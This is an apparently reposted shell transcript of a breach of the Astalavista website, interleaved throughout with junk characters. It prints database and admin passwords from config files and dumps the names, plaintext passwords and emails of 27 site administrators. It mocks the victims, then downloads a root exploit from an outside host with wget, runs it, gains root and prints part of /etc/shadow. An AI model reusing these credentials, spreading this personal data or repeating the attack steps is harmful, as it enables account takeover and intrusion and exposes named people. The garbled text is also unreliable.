drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0079 M2 X0 V- u0 |3 K! m9 T. f" A; c
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql: l/ S6 j: Z/ R) [2 h, X* S S' m
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
7 \! `1 ~0 N. ]drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
6 h3 C6 _2 \6 t8 ^$ Odrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner1 p' k! j7 Z3 G4 w/ t. z$ s) w( R
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
3 `' q1 C3 S. v; M: T7 D/ adrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config" g! h' O$ N+ [9 w& k. F1 J2 J
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron9 q; _( L% k5 K5 ]* _; x$ J3 C( R
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
$ f$ X# A. K6 i) B8 q8 Z' w% O9 j9 Y-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php2 `+ w9 o, ?0 {* G! `
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
- h# Z8 Y0 {: y9 Gdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
0 h) m8 A- e" @( _! ldrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour( k) M3 |+ p) L# [0 Y* F
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
% g8 }# ]( k: w# S-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
' a1 ^3 E' Y2 | o9 s; [1 |- G& I ~. C-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php( T) @2 k( k4 m, y( \! u* s
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html$ `: \8 v. w/ e7 e
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php, k7 u$ L( D2 r, n( j1 S) A/ ]
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
' q2 _ R) Z4 S" @ s: i-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
. \( ?5 u m! fdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
1 Q0 e- D* b1 n: }2 [1 f) ] @drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang& Q0 Q( V3 u5 s6 a
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib( b& T! X% B- f4 U. i; l1 w! u
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
4 @" ]8 S0 P% M G8 Q% d, pdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member# W" n" O& M- K% O5 {+ e& n3 N
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
3 n3 s7 S+ q: ]! T# {& Q, }drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new; A" ?3 f- v" @& ?. h: |7 [' |
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf* I6 F. x# a3 _2 ^1 _( _8 M5 z" R
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re5 J" o# a8 ^1 }5 y8 g1 o u/ h
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt- x* { ~4 W& Q6 f- S0 y- ?
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
( q& _: O! D0 ~% Q- Zdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
. F3 ^, M. h: n H' Z. adrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com" f8 Y$ H9 p% e# e8 f/ [# }
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes- h6 {5 Y+ ~: V4 z" S* d8 Z
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
. g$ E# ?: M% y% P5 J; w k( bdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl; V0 a- k* i& Z$ `+ X s5 I
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2# `' i* b( c! ~- q2 h& R+ o
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old( x3 S$ G, W X- g1 V# l+ w& |
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php& b: W' L" L, L6 d) c
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki0 @) v% J G/ i$ j1 B
, o7 B- k, T* _. w$ r4 k& J8 qsh-3.2$ head -20 index.php) c6 Y2 o; W2 {& [+ S% W
<?PHP
: Y, Q# L8 {* X5 R4 Q5 b/**
' l9 b! q, @3 X9 U _+ s) w" f0 O6 E0 J* Mainfile (external) for astalavistaNET v2.0
1 J# R+ ]! t. N- X# u& J' }7 i7 T*
+ a8 e! `# L. v; s* @copyright Astalavista IT Engineering GmbH
6 W' C" K& L4 P& ~) Y9 Z* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>1 B# v3 n( D+ W
* @version 1.0
; X A4 v5 x, O: c*/- z) _2 Q) ~$ S; O" ~' I9 p
7 K" n" q$ ]3 g5 s if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
; R* U) D! ]0 Q/ v* t. o $dontStartSession = false;
( ?! [: |2 R, C+ c( i* ?. J } else {
5 N% c/ b* G, Z! @3 {- B x $dontStartSession = true;
6 o+ o/ z* y/ I8 N }5 X* x# \7 h9 E9 X- z, [ k0 G8 k$ z
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);) z: g7 H: O0 J& x6 t
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);) S% p/ `6 ^& p+ G- b
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
: R6 f7 D8 b2 l8 \+ e" \ require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
' ~" V# [8 M6 a. l
; ^4 f5 K9 R; N a) {5 b$ qsh-3.2$ cd config
2 E; V& I* V9 g# {5 p, Ush-3.2$ ls -la
1 w& G- f: i& L. B1 f$ `total 32
9 v5 M/ O, ^* Z9 @0 ?+ Z( Vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
9 L3 ^4 x$ X; @, ^drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; k- J, S+ b8 c* C" [4 f' x8 ^
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php7 J8 o/ s8 g6 h' V+ Q( x/ z
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
+ Z9 H/ U$ K, O7 t-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php0 w. J5 V5 X4 |
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php) P) r7 H7 I- i0 a; L
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php# h9 ^; k# A; e8 P9 V" D4 L
9 {! \( X0 ?1 a V; r9 r$ w, Bsh-3.2$ cat com.conf.php
. G% r/ Y7 O: E7 Q[snip]
8 I; i; v6 S0 R- M* M//member-database
7 _; U# ]3 _/ Y3 f" T$_CONFIG['db_mem_server'] = ‘localhost’;: f- R+ r& H5 q) ~1 W2 i9 p5 U
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
/ h/ C" j3 ]. |5 [& r$_CONFIG['db_mem_user'] = ‘astanet_db’;- O4 h1 }4 D7 k+ n. K
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;2 g) Z, L. I$ j! c, o3 a! q
$_CONFIG['db_mem_debug'] = false; //true or false: `1 |5 c3 d/ J/ @- A# ^5 V% I
//ads-database, N( ~) i6 C' G$ z
$_CONFIG['db_ads_server'] = ‘localhost’;" Z1 w: ?4 J# [5 e" c" J3 R3 ?
$_CONFIG['db_ads_database'] = ‘astanet_ads’;( u$ m) r0 D8 T
$_CONFIG['db_ads_user'] = ‘astanet_db’;4 x. s% b1 G; M# \; C
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;1 P: _+ Y- K. S5 B3 B1 b
$_CONFIG['db_ads_debug'] = false; //true or false' { G, c7 o5 ?, g
//rainbow-database, u& K- ]7 ]& O5 U8 s9 q
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
6 M9 o3 x; z7 d% I! H m$_CONFIG['db_rainbow_database'] = ‘rainbow’;+ n( \5 m1 u: ]
$_CONFIG['db_rainbow_user'] = ‘dinu’;
7 o, g+ G9 D9 z9 [! C$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
" y1 @# g# {. B) J9 M: l9 d' c$_CONFIG['db_rainbow_debug'] = false; //true or false) L: a5 V* c1 z2 J. f3 I
//mailing lists database
. [: m4 s7 _& Y$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
, S, s$ w2 c* f$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;! i' X# A# o( U7 Q' x
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
6 r- \* ~: A# u/ `3 i5 ~$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
. U2 c, ~# K* S( U$_CONFIG['db_mailing_lists_debug'] = false; //true or false
) n+ a, J1 l) v' J4 R+ R: J//paypal8 s" j8 W9 R5 ?5 ]9 K
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;% Z& Q( L$ s1 g( U
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
0 U1 _4 e F2 L* Z r4 v$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
# I8 U3 J' ^% S V1 u3 L; q: b$_CONFIG['sub_pp_noship'] = ‘1′;( v4 N& ?0 ~0 h7 p! ?% {7 s% H
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
2 {) N5 H# S3 f3 X( v[snip]& [! \$ b6 N& Q! Y: ]# f
3 O9 |* X2 e E. ^
sh-3.2$ cd ..
5 s3 E$ d8 Y) X0 a7 zsh-3.2$ cd member* T5 `! s2 K3 B" y/ ?0 ?
sh-3.2$ ls -la& N" F( p: a: e2 B: j
total 20
B$ _6 X" x# ~ Ydrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
; w6 W a; [0 A( Fdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
/ g. `5 o2 K$ E-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
9 Y/ B7 a1 g) p$ a, P( F5 }-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php& }4 y7 J* H6 W" Z0 {' [
sh-3.2$ cat .htaccess
6 j% N# y5 ]6 _5 W2 S7 O" bSecFilterEngine off
& g3 t9 v' B2 l: v
! [9 a( N) W# {7 |- l3 ?* g) Psh-3.2$ cd ..: ], \0 S! J; a" Y! ~2 |% H" m
sh-3.2$ cd cron
" {! z6 w0 j' h+ ~3 q5 g4 qsh-3.2$ ls -la
5 v" w5 G a0 v7 ?5 D8 ^0 Ftotal 1685 _; a. Q" z( `. ~" U+ A S
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
" Y. X) }9 t% c$ x* E: r- W. G; Mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
' q9 @1 ]4 B( }9 H-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php7 i5 X" [" ]: \2 B
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
# I, w! J* s; W0 [' l-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php; v9 r5 {/ e7 H" O+ j" ]
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php0 n# x3 u. V k9 k* z. A) o9 F
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
3 q% F2 ~9 D( A' @# ]! d-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php0 q( f/ b& }) O( |/ N& r6 Q
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
. T6 d+ d# g* B; k9 o9 M5 q" ?-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
0 o: ^" S) s6 s9 o# h-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
; u! e- m1 Z6 F4 L; m5 V-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
6 t* S% _) [) c( W& F% @-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php' W) \; Z/ {, Y0 U, C! D
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
7 g \% X7 u5 m' X-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
9 Q) B8 \5 W& N4 b5 @5 G( j/ L-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
, E4 N$ f/ D n6 X7 O6 n-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php D% r: N' t2 D' K- `3 M, y
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php! n' W% j, M6 ^ L5 ?
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php4 j7 F1 p4 \1 S u5 _' z
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
% S, m& }' P) S- [) A7 u1 v# y$ w, Udrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
4 r$ z* c& k8 [! F$ P( D-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
. z8 n W: H( t-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
/ y& b9 Y$ e1 v9 M2 x e8 w
$ Q r; Z6 `2 g1 j; f3 Rsh-3.2$ cd ..
1 U" Q" w. U/ b" }" o8 b' {# b$ p& Esh-3.2$ cd _007. q2 [ D! V) g: M
sh-3.2$ ls -la5 e# l# O0 u {$ w" z |
total 24
/ n f& W- |+ H( [7 |5 @drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
7 Z" E4 @2 y& E# Sdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..- Y- h7 E, Y/ I: j" L g
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess, o; ^& ?3 X/ |9 K2 y' o) \
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php: o6 ^* g: }4 {. Z& m: ~( p
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
8 L9 D4 H* [, m7 N% S! odrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
+ w/ a$ o9 O' X
2 x$ F6 M) ?5 n5 M: |' r( @sh-3.2$ cat .htaccess
! c6 \4 r0 O( I5 @' C( pauthType Basic& s8 G+ A! Q) ?# ^! k
authName Admin: S: k k" R" l* s/ D! y" Q
authUserFile /home/astanet/auth/.htadm_pwd
6 |8 v1 o6 R0 Crequire valid-user9 o7 R& i( P2 L- z( l( {2 ?3 y7 X
; Y) ?; A* \. ish-3.2$ cat /home/astanet/auth/.htadm_pwd9 e, O' p. j. Q: n
admin2net:CR0bl65MwhfT: p+ u$ n3 B# Q4 h' Q, T( k1 B
U: p! c7 q* x( T5 M1 }sh-3.2$ mysql -u astanet_db -p
6 |& \* m: w2 f3 l( `1 D: eEnter password:' B3 N' N- W @, F3 B
Welcome to the MySQL monitor. Commands end with ; or \g.# Z2 }0 I J9 X, [# \
Your MySQL connection id is 275153
% I/ L! T; J; S$ I# _' y7 T: XServer version: 5.0.45-community-log MySQL Community Edition (GPL)
0 V* y7 ?( S" ]' e. Q3 B( e8 Q/ p
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
& F& ?) V( z g1 g7 G* J2 e. v! D# ~
' v/ x" V$ u: G0 P |9 rmysql> show databases;
- H/ A" ?1 {) x8 U6 D4 n" f+———————–+
- C0 r6 S* a0 h/ f7 ^2 s9 j| Database |7 ~* h" V" z8 d" H4 W5 T7 S
+———————–+* e- i; o! O: w) s* `1 I
| information_schema |
0 b& g ~' k9 n8 C+ O- {4 X| astanet_ads |1 F& x0 o1 j4 w& j4 C7 \- g
| astanet_mailing_lists |6 `5 e& w( D& h! D- b& F) t
| astanet_mediawiki |
: S) R( ?' n6 ~4 U* R! c: y| astanet_membersystem |
& L; G+ o3 @' g1 w- V& N" z- L| test |9 [7 l# ~! W; J8 B% R! r+ _
+———————–+
! @4 d5 O$ g& M# F* U6 rows in set (0.00 sec)1 _$ Z; q! r) |# a3 {
% O1 T% W* a1 |mysql> use astanet_membersystem! @2 \/ o0 h) n+ W: O* V
Database changed R8 d. n) \3 Y! i. M8 W7 l+ v$ t7 D
mysql> show tables;
: t, E8 [( @" b3 l5 y+———————————–+
8 K, n( Y+ t3 B| Tables_in_astanet_membersystem |8 Y& r2 P% i4 A* @$ Q- B+ x; }5 ?1 O
+———————————–+
: K1 U& v' s7 L! c/ b| blacklist_categories |$ M, |3 H" G+ S8 ?4 Z1 E3 S
| blacklist_content |
. O. b+ V& r* `4 R* u+ S- d| blacklist_levels |9 ?( I# w+ D8 \: S0 @3 r
| blacklist_mcset |# u1 f- c" l8 P* U$ F) C& z
| dir_categories |- j# D4 p+ m2 g8 `8 L
| dir_comments |
q5 ]5 f1 M2 s: D) H" t| dir_links |
' K/ \& W9 h' k( J2 @! p| dir_temp |
9 R K1 a7 P3 x3 X6 j| dir_votes |
# a+ \, `1 a; g/ u4 b: a8 M| documents |
) |+ ^ g% g( I# q+ h2 b, h| documents_categories |
9 c- W! }: S1 F/ c* |4 h) U# a| email_content |
/ o+ S, ~) n' ]3 [% k( X| email_settings |+ G4 | u* Y, O( j" w
| exploits |
5 T8 \, x+ e! s; |6 o1 [| exploits_categories |# g' p9 Q- n; b
| exploittree_categories |1 x6 z$ r% Q+ d2 m. S/ R
| exploittree_exploits |# z$ Z( | G- w1 d6 T( C
| home_values |
+ N5 j" l. k# ^) s7 h; G| iso_countries |
q/ f! e* C3 f- S| links_categories |/ A! X0 h ^8 A; i
| links_records |! W4 S8 l* O% q/ X4 x
| links_unauth |
# H# P0 b4 }% n. y( b: I| links_votes |
( ?4 u4 H0 h: u+ d8 g' c! s: l+ a| log |7 |4 D' C4 i1 `4 u- E! Z
| news_categories |4 V8 B# g: s( S
| news_comments |3 N6 x/ A! Z+ H/ b% ^/ k1 b
| news_emoticons |
( a( F, W$ U h; H* d| news_latest |, n- [$ @9 d% ?+ _9 d* H
| news_messages |
8 K* S3 A: K0 V7 ], h- _| news_statistics | k4 V0 W" i# Y, B( K* o, u- |
| news_votes |
. C6 D$ h! h+ j- ]1 x/ E| prices_content |7 ?. o: Y" Y7 p4 t; `! J; U) d0 x
| prices_offers |
/ P5 E; F& x @; N| rss_settings | N7 w4 }5 w G/ a5 g
| sessions |$ o/ l ^3 R4 e, S& N- j# w- N
| stats_signups |
! W: t/ `- g6 R! {) L| u2u2 |# T( H3 |9 h, R: U& \
| u2u_contact |
3 ]* g2 ~9 e! Y, t| u2u_settings |
8 S9 e3 |" W, T4 K, J7 L/ _| user_keywords_selected_categories |5 W, C3 [( {$ h X f! ?
| users |0 L$ i7 J$ E: }! ^( H5 B" J% h
| users_ipn_test |9 l$ b4 s- a8 E4 U
| users_keyword_values |
5 l. F1 a. }& l I| users_profile |
6 x4 h- t! K( H| users_temp |
) M- b' d% n- p* T ]. k9 T| users_upgrade |
9 k8 S9 x+ j( o! X* @. K* B+———————————–+6 e" M% q" r/ |3 \: d
46 rows in set (0.00 sec)
: O A4 H: v1 V( D W6 i: [) H5 w4 T1 s, t4 t7 F& \7 d
mysql> describe users;
. F7 d" f: H' D/ a3 t+————————–+————————————–+——+—–+———————+—————-++ R9 I* J4 c# \* x3 o. |
| Field | Type | Null | Key | Default | Extra |1 D$ B7 i+ T, N6 o
+————————–+————————————–+——+—–+———————+—————-+
# R# ? e( K: t3 q7 ]: z8 |3 x" h| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
$ q4 f g- C! ^6 U6 r5 M- D8 j| user | varchar(50) | NO | | | |0 Y6 \5 |6 r f; R
| nickname | varchar(30) | NO | MUL | anonymous | |
$ D& p0 M" U, n( l) _| password | varchar(30) | NO | | | |& ^4 ?+ ^0 }; {8 l$ r
| userlevel | tinyint(3) | YES | MUL | NULL | |
0 z' ]7 M: V5 m2 Y| exp | int(8) unsigned | NO | | 0 | |- c& O9 n. H* B9 U1 `/ @6 Q# N
| email | varchar(50) | NO | | | |6 r) P; }8 x" `' e2 x
| ip | varchar(15) | NO | | 0 | |
, A; P9 e8 A1 u. e [| proxy | set(’0′,’1′) | NO | | 0 | |
6 h7 a' h5 `' t| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |' C! z0 C8 J+ u5 d! v- J {
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |0 q) X7 S# ]% y* ?# {. l
| anz_in | tinyint(1) | NO | | -1 | |
# y% K$ j e9 Y9 G# S| status | tinyint(1) unsigned | NO | | 0 | |/ n$ w- { m3 h4 n
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
% \' t x$ ~+ g2 A5 P- q7 Q1 u| freemember | set(’0′,’1′) | NO | | 0 | |! N$ w1 i' I3 E$ w* l
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |' h/ U# u7 i- ?: k% u/ @3 K: c: N
| lang | tinytext | NO | | | |
; F; I' x6 w0 X* X3 V; C* V& O% c4 z6 W| adid | smallint(6) | NO | | 0 | |9 W# ?; C" t: k0 m+ D2 S
| pp_txn_id | varchar(255) | YES | | NULL | |
/ k' P Y1 `' o4 G+ q| cnb_transaction_id | varchar(255) | YES | | NULL | |1 D+ f" E# b. c3 h
| cnb_order_id | varchar(255) | YES | | NULL | |
$ _" J. S: E" v. r| cnb_user_id | int(11) | YES | | 0 | |( v: m" r; y, p7 n/ @0 r* O; N" {: B
+————————–+————————————–+——+—–+———————+—————-+
8 |$ P$ d; Q& P& P# ?22 rows in set (0.01 sec)% O6 T0 m" e1 f
" f' |& D) Q: \. I. z+ z0 L
mysql> select count(*) as skids from users;
" ?/ s( h2 m2 B4 d6 S% |9 z; i' D+——-+- I) Q, F' |" X9 {
| skids |
4 n& I! ~8 S1 C9 K; V+——-+3 \6 o. A$ m5 g# q6 w' e9 D5 K
| 25199 |
0 Q# W1 p; H3 D) z& }+——-+# O. E% p" y% v- ^. y6 @
1 row in set (0.00 sec)
8 r; `% O" E& e
+ o! m; s& f3 _ q2 ?# `/ B' vmysql> select user,nickname,password,email from users where userlevel = 1; _/ m8 W$ Y3 u' u! r
+————————–+———————-+——————+———————————–+
3 i9 t( f% ]7 _' k3 A5 M: y| user | nickname | password | email |
2 T% Q' H+ C* M& q; x+————————–+———————-+——————+———————————–+
, O4 M+ a4 o% S4 x8 `5 |( T' S7 W| pascal | prozac | astaman3 | 链接标记info@astalavista.net |6 H% b4 F4 R3 L
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
: I: R2 F- z& U# C* K" ]# X| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
& a3 q" R4 {7 S0 K9 Z| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |: Q( K3 A$ r7 n/ i: A& w+ ?/ ?$ a
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |% {! ?( P/ s4 O) S
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |4 z# E( d: D. l" I4 c! @8 g
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
8 V" k9 |! g. u| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |3 h$ m- D0 H0 M6 x9 L0 V' F
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
' ^5 Q6 {, P/ w* r. w. g: w| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
8 d$ y# z0 I/ o/ Q t- N| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
2 l7 j6 V" Y K. j8 P4 m/ G7 p% J| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
6 F" j* T# S, l| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |5 Z" y& x- E q
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |5 c0 U8 |8 y# {" N! A3 |, P4 S
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
/ b4 c6 E" M" h0 p* B/ x| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |% S5 a; H7 B7 d4 W1 J' g0 ^
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |7 |3 ^+ X2 I+ p- c" t+ W+ [
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
# k1 J9 l) B( K6 U, M+ e| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |6 }+ z" s7 }# q7 F
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
3 N7 |& b' c6 p7 p5 x; G) K% `+ [| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
, W e" |+ U3 H- ?4 n6 A; h V- d| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com | Y; v2 z1 V! ?5 d5 S
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
5 W+ f9 V& o/ `: g| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
{3 ~8 [* |8 H- A! P| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |# I" A& ^ d/ _ H! Y
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |7 O, c5 U* A5 C3 Q, Q* I8 v
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
6 R7 L$ G6 ?9 I6 B; b3 R! L7 ~+————————–+———————-+——————+———————————–++ P+ X6 Z N$ F
27 rows in set (0.00 sec)6 ^8 k/ C8 u1 o/ }; S& V
z T6 [" }# m4 U
mysql> exit;) g9 l2 u% o r! e: R
Bye
! u% Z2 V6 q+ L
8 c) h$ z9 B5 M2 W. V/ \+ @[~] plaintext passwords? yes,4 H! M* v P$ B# H5 [! J
Those so called “security professionals” who charge you $6.66 / month to4 |5 G0 \ t. G( w& B1 Q" s
register at their hack-proof portal, save your passwords in plaintext…. s* W3 T; G' x/ b* h
brilliant!
7 o9 @4 Y0 a. k) \, U* H* G1 Z
0 |; W0 G; r5 Q[~] This been fun but we want more.
+ Q0 M2 ?& A! @- `! v: I' y' f; I8 N9 [% r8 c; A7 p8 Q
sh-3.2$ uname -a
. B4 o f9 i* V6 g2 aLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" [ `: K8 o3 J4 y1 l! Ssh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]( p! B; h+ ~% H8 \
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]7 p7 v* ~% Z2 d+ P- V
Resolving anti.sec.labs… 13.33.33.370 d8 D x* r* X1 W0 i+ B. J
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
& ^6 R7 x; s5 b! G5 dHTTP request sent, awaiting response… 200 OK3 @1 c; P# Z' `' h* s3 O& j, I; x
Length: 18200 (18K) [text/plain]+ J; x4 \; P/ x$ B3 q9 `
Saving to: `g0troot’1 L" e/ ?; ~; h0 c1 d: b, F* Y8 A
# {6 T/ J, J/ M/ c. @4 z4 Q100%[=========================================================================================================================================>] 18,200 58.6K/s in
+ @; r, Z% ~1 U0.3s2 d+ T5 N, K8 T$ a
" N* H" ]( P' T+ B6 `% u8 A& M; [
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
: x) q7 y" {. T( J6 G& x; m. [7 T7 g8 w: s# V
sh-3.2$ ./g0troot -i x86_64
9 [1 ]+ m. R& z0 d3 J[+] g0troot - anti.sec.labs+ V& ]& N/ S1 w* {( H
[+] Target: 2.6.18-128.1.10.el5
' \+ N# d) _1 S( A[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
$ j8 q M) Q/ C. B8 x$ L9 T2 ^
) y5 y! e# x2 v# @4 k[+] r00tr00t0 o7 ^8 |; d, r3 C4 v1 O1 n
[~] Executing shell…) K0 R* N" B v1 S5 z# ?+ m
5 c/ [' R$ ]* rsh-3.2# id
5 t* S1 R# j; i" ?uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
; a0 w( k3 r9 S8 i) C1 S. e$ {! [. |
sh-3.2# cat /etc/shadow1 I+ z" J5 C, ]" Y$ s8 W
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::( e5 |& N# W& q3 v( F L/ i
[snip]
' ^3 g* u2 }3 ]; T9 \8 w% A! D2 h3 Eadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::. q' [5 p0 u. H) s" o& y
